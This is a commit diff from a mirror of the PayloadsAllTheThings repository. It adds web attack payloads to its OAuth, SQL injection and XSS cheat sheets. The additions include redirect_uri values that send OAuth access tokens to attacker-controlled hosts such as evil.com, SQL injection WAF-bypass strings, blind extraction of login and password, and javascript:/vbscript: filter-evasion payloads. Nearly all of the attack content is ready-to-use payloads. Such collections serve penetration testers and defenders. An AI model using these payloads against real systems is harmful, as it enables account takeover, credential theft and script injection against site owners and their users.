mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XSS,SQL OAuth Updated
This commit is contained in:
parent
7d67aa4e0d
commit
07388503b0
@ -1,12 +1,20 @@
|
|||||||
# OAuth 2 - Common vulnerabilities
|
# OAuth 2 - Common vulnerabilities
|
||||||
|
|
||||||
## Grabbing OAuth Token via redirect_uri
|
## Grabbing OAuth Token via redirect_uri
|
||||||
|
Redirect to a controlled domain to get the access token
|
||||||
```
|
```
|
||||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
|
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
|
||||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
|
|
||||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
|
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
|
||||||
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Redirect to an accepted Open URL in to get the access token
|
||||||
|
```
|
||||||
|
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
||||||
|
https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
|
||||||
|
```
|
||||||
|
OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect.
|
||||||
|
|
||||||
|
|
||||||
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
|
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
|
||||||
```
|
```
|
||||||
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
|
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
|
||||||
@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut
|
|||||||
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
|
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
|
||||||
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
|
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
|
||||||
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
|
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
|
||||||
|
* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
|
||||||
|
@ -5,12 +5,9 @@ I <3 pull requests :)
|
|||||||
|
|
||||||
Last modifications :
|
Last modifications :
|
||||||
* XSS paylods improved
|
* XSS paylods improved
|
||||||
* Methodology added
|
* OAuth vulnerabilities added
|
||||||
* AWS Bucket added
|
* AWS Bucket added
|
||||||
|
* SQL payloads updated
|
||||||
|
|
||||||
Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
|
|
||||||
|
|
||||||
|
|
||||||
# Tools
|
# Tools
|
||||||
|
|
||||||
|
@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|||||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
##MYSQL Time Based
|
##MYSQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
|
@ -112,6 +112,42 @@ admin") or "1"="1"/*
|
|||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## WAF Bypass
|
||||||
|
|
||||||
|
No Whitespace - bypass using comments
|
||||||
|
```
|
||||||
|
?id=1/*comment*/and/**/1=1/**/--
|
||||||
|
```
|
||||||
|
|
||||||
|
No Whitespace - bypass using parenthesis
|
||||||
|
```
|
||||||
|
?id=(1)and(1)=(1)--
|
||||||
|
```
|
||||||
|
|
||||||
|
No Comma - bypass using OFFSET and FROM
|
||||||
|
```
|
||||||
|
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
||||||
|
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||||
|
```
|
||||||
|
|
||||||
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
|
```
|
||||||
|
?id=1 AND 1=1#
|
||||||
|
?id=1 AnD 1=1#
|
||||||
|
?id=1 aNd 1=1#
|
||||||
|
```
|
||||||
|
|
||||||
|
Blacklist using keywords case insensitive - bypass using equivalent
|
||||||
|
```
|
||||||
|
AND -> &&
|
||||||
|
OR -> ||
|
||||||
|
= -> LIKE,REGEXP, not < and not >
|
||||||
|
WHERE -> HAVING
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Thanks to - Other resources
|
## Thanks to - Other resources
|
||||||
* MySQL:
|
* MySQL:
|
||||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||||
|
@ -113,6 +113,9 @@ java%0dscript:alert(1) - CR (\r)
|
|||||||
Using the escape character
|
Using the escape character
|
||||||
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
||||||
|
|
||||||
|
Using the newline and a comment //
|
||||||
|
javascript://%0Aalert(1)
|
||||||
|
javascript://anything%0D%0A%0D%0Awindow.alert(1)
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS with data:
|
XSS with data:
|
||||||
@ -121,7 +124,10 @@ data:text/html,<script>alert(0)</script>
|
|||||||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XSS with vbscript: only IE
|
||||||
|
```
|
||||||
|
vbscript:msgbox("XSS")
|
||||||
|
```
|
||||||
## XSS in files
|
## XSS in files
|
||||||
XSS in XML
|
XSS in XML
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user